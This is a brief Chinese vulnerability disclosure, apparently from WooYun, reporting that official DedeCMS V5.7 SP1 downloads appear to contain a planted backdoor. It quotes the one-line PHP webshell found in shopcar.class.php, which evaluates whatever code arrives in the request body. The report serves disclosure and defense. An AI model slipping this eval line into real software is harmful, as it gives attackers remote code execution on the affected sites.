Dedecms疑似被植入后门

发表评论 (0) 查看评论

披露状态:

2012-03-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-03-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

DedeCMS V5.7 SP1正式版

UTF-8 GBK版本疑似被植入一句话后门

前几日下载并不存在此代码

详细说明:

shopcar.class.php被植入一句话@eval(file_get_contents(‘php://input’));

 

版权声明:转载请注明来源 jsbug@乌云

发表评论?

0 条评论。

发表评论